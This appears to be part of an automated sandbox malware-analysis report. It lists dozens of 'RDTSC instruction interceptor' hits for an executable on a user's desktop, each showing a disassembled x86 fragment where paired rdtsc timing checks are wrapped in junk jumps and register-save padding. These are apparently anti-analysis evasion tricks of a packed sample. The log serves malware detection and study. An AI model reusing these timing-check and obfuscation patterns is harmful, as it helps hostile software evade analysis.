Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109AAD3 second address: 109AAE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F1F50CBBC36h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0DAA second address: 53B0DAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0B47 second address: 53A0B56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0B56 second address: 53A0BC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F1F50F77981h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F1F50F7797Eh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov al, bl 0x0000001c pushfd 0x0000001d jmp 00007F1F50F77986h 0x00000022 sub ch, 00000018h 0x00000025 jmp 00007F1F50F7797Bh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0BC2 second address: 53A0BF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1F50CBBC3Fh 0x00000009 add ecx, 724F00DEh 0x0000000f jmp 00007F1F50CBBC49h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0B6E second address: 53E0BEC instructions: 0x00000000 rdtsc 0x00000002 mov di, B3F4h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a pushad 0x0000000b mov bl, ch 0x0000000d push ebx 0x0000000e movzx esi, di 0x00000011 pop edi 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F1F50F77984h 0x0000001d xor cl, FFFFFFD8h 0x00000020 jmp 00007F1F50F7797Bh 0x00000025 popfd 0x00000026 mov edi, esi 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b jmp 00007F1F50F77982h 0x00000030 pop ebp 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F1F50F7797Eh 0x00000038 jmp 00007F1F50F77985h 0x0000003d popfd 0x0000003e push eax 0x0000003f push edx 0x00000040 mov bx, cx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53800D8 second address: 53800DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53800DC second address: 5380113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F1F50F77986h 0x0000000b jmp 00007F1F50F77982h 0x00000010 pop ecx 0x00000011 popad 0x00000012 push ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380113 second address: 5380126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380126 second address: 538019E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F1F50F7797Eh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 movzx eax, bx 0x00000017 pushfd 0x00000018 jmp 00007F1F50F77983h 0x0000001d sub cl, FFFFFFAEh 0x00000020 jmp 00007F1F50F77989h 0x00000025 popfd 0x00000026 popad 0x00000027 push dword ptr [ebp+04h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F1F50F7797Dh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538019E second address: 53801D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b jmp 00007F1F50CBBC44h 0x00000010 push dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F1F50CBBC47h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53801D9 second address: 53801DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0956 second address: 53A0966 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 0B8Ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0966 second address: 53A096D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A096D second address: 53A0973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0973 second address: 53A0977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0977 second address: 53A097B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0550 second address: 53A0575 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1F50F7797Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0484 second address: 53A04A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A022B second address: 53A0231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0231 second address: 53A0235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0235 second address: 53A0285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F1F50F77982h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov ah, bl 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 jmp 00007F1F50F77984h 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007F1F50F77983h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0285 second address: 53A028B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A028B second address: 53A028F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0008 second address: 53B000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B000C second address: 53B0012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0012 second address: 53B0039 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1F50CBBC45h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0039 second address: 53B0070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F1F50F7797Dh 0x0000000b xor esi, 6F179A96h 0x00000011 jmp 00007F1F50F77981h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e mov edx, 05D257A0h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0070 second address: 53B00E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F1F50CBBC40h 0x0000000f add ax, B518h 0x00000014 jmp 00007F1F50CBBC3Bh 0x00000019 popfd 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F1F50CBBC46h 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F1F50CBBC47h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B00E2 second address: 53B00E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B00E8 second address: 53B013A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov di, 5AC6h 0x00000013 pushfd 0x00000014 jmp 00007F1F50CBBC47h 0x00000019 add esi, 0E65C94Eh 0x0000001f jmp 00007F1F50CBBC49h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0A94 second address: 53E0A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0A9A second address: 53E0A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0A9E second address: 53E0B3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77987h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F1F50F77986h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F1F50F7797Eh 0x0000001a jmp 00007F1F50F77985h 0x0000001f popfd 0x00000020 push esi 0x00000021 call 00007F1F50F77987h 0x00000026 pop ecx 0x00000027 pop edi 0x00000028 popad 0x00000029 pop ebp 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F1F50F77982h 0x00000031 sbb ax, D1B8h 0x00000036 jmp 00007F1F50F7797Bh 0x0000003b popfd 0x0000003c push eax 0x0000003d push edx 0x0000003e mov cl, ABh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C00BE second address: 53C00C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C00C2 second address: 53C00C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C00C8 second address: 53C00CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C00CF second address: 53C00E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov edi, 53732D8Ch 0x00000010 mov dl, 96h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C00E2 second address: 53C0114 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1F50CBBC43h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F1F50CBBC40h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0114 second address: 53C0118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0118 second address: 53C011E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C011E second address: 53C0177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1F50F7797Ch 0x00000009 sbb cl, 00000038h 0x0000000c jmp 00007F1F50F7797Bh 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 jmp 00007F1F50F77984h 0x0000001e mov eax, dword ptr [ebp+08h] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007F1F50F77988h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0177 second address: 53C017D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C017D second address: 53C0181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0181 second address: 53C0185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0185 second address: 53C01CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b jmp 00007F1F50F77989h 0x00000010 and dword ptr [eax+04h], 00000000h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushfd 0x00000018 jmp 00007F1F50F7797Ah 0x0000001d xor cl, FFFFFF88h 0x00000020 jmp 00007F1F50F7797Bh 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A036C second address: 53A03F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1F50CBBC47h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F1F50CBBC49h 0x0000000f jmp 00007F1F50CBBC3Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F1F50CBBC44h 0x00000020 xor cx, C638h 0x00000025 jmp 00007F1F50CBBC3Bh 0x0000002a popfd 0x0000002b push esi 0x0000002c pop ecx 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 jmp 00007F1F50CBBC43h 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A03F5 second address: 53A040D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50F77984h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0CCD second address: 53B0CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, 362D9C8Dh 0x0000000b popad 0x0000000c mov dword ptr [esp], ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0CE2 second address: 53B0CF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0F1F second address: 53B0F4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ecx, 60CC736Dh 0x00000011 mov edx, esi 0x00000013 popad 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0F4B second address: 53B0F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0F51 second address: 53B0F56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0304 second address: 53E033E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1F50F77988h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E033E second address: 53E0342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0342 second address: 53E0348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0348 second address: 53E0373 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1F50CBBC3Ch 0x00000008 pop ecx 0x00000009 mov ecx, ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 jmp 00007F1F50CBBC3Dh 0x00000015 xchg eax, ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0373 second address: 53E0386 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F7797Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0386 second address: 53E03EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1F50CBBC3Fh 0x00000009 and ax, E93Eh 0x0000000e jmp 00007F1F50CBBC49h 0x00000013 popfd 0x00000014 jmp 00007F1F50CBBC40h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov eax, 67803A13h 0x00000025 call 00007F1F50CBBC48h 0x0000002a pop ecx 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E03EE second address: 53E03F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E03F3 second address: 53E044A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F50CBBC3Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ecx 0x0000000d jmp 00007F1F50CBBC40h 0x00000012 mov eax, dword ptr [76FA65FCh] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c pushfd 0x0000001d jmp 00007F1F50CBBC43h 0x00000022 jmp 00007F1F50CBBC43h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E044A second address: 53E0496 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007F1F50F7797Eh 0x00000010 je 00007F1FC2ABAE65h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F1F50F77987h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0496 second address: 53E04FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ebx 0x0000000f mov bh, cl 0x00000011 popad 0x00000012 popad 0x00000013 xor eax, dword ptr [ebp+08h] 0x00000016 pushad 0x00000017 mov bx, D43Eh 0x0000001b popad 0x0000001c and ecx, 1Fh 0x0000001f jmp 00007F1F50CBBC40h 0x00000024 ror eax, cl 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushfd 0x0000002a jmp 00007F1F50CBBC3Ch 0x0000002f or cl, 00000038h 0x00000032 jmp 00007F1F50CBBC3Bh 0x00000037 popfd 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E05DD second address: 53E05F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F7797Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539003B second address: 53900F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 mov dl, 11h 0x00000007 pushfd 0x00000008 jmp 00007F1F50CBBC46h 0x0000000d sbb ch, FFFFFFC8h 0x00000010 jmp 00007F1F50CBBC3Bh 0x00000015 popfd 0x00000016 popad 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a jmp 00007F1F50CBBC46h 0x0000001f and esp, FFFFFFF8h 0x00000022 pushad 0x00000023 pushad 0x00000024 mov cx, F5C3h 0x00000028 call 00007F1F50CBBC48h 0x0000002d pop esi 0x0000002e popad 0x0000002f pushfd 0x00000030 jmp 00007F1F50CBBC3Bh 0x00000035 sbb ah, 0000001Eh 0x00000038 jmp 00007F1F50CBBC49h 0x0000003d popfd 0x0000003e popad 0x0000003f xchg eax, ecx 0x00000040 jmp 00007F1F50CBBC3Eh 0x00000045 push eax 0x00000046 pushad 0x00000047 push edx 0x00000048 pop ecx 0x00000049 mov ch, dh 0x0000004b popad 0x0000004c xchg eax, ecx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 movsx edi, cx 0x00000053 mov dx, si 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53900F0 second address: 539016F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F7797Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F1F50F77986h 0x0000000f push eax 0x00000010 jmp 00007F1F50F7797Bh 0x00000015 xchg eax, ebx 0x00000016 jmp 00007F1F50F77986h 0x0000001b mov ebx, dword ptr [ebp+10h] 0x0000001e pushad 0x0000001f mov ecx, 023DA94Dh 0x00000024 mov bl, ch 0x00000026 popad 0x00000027 push ecx 0x00000028 pushad 0x00000029 mov edx, esi 0x0000002b mov cx, 2D03h 0x0000002f popad 0x00000030 mov dword ptr [esp], esi 0x00000033 pushad 0x00000034 mov cx, 397Bh 0x00000038 jmp 00007F1F50F77980h 0x0000003d popad 0x0000003e mov esi, dword ptr [ebp+08h] 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539016F second address: 5390176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ch, dl 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5390176 second address: 53901B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F1F50F77986h 0x0000000f mov dword ptr [esp], edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F1F50F77988h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53901B5 second address: 53901CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53901CC second address: 53901D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53901D0 second address: 53901D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53901D6 second address: 53901DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
